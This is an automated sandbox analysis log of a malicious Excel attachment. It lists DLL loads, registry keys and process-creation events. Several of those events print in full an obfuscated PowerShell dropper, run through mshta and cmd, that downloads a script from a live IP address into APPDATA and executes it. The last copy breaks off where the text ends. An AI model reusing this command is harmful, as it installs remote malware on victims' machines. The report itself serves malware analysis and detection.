        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: Euro confirmation Sp.xlsStatic file information: File size 1062912 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.pdb source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.pdbhP source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.pdbhP source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.pdb source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: .pdb]sf+ source: powershell.exe, 00000007.00000002.465465325.000000001C40A000.00000004.00000020.00020000.00000000.sdmp
        Source: Euro confirmation Sp.xlsInitial sample: OLE indicators encrypted = True

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lk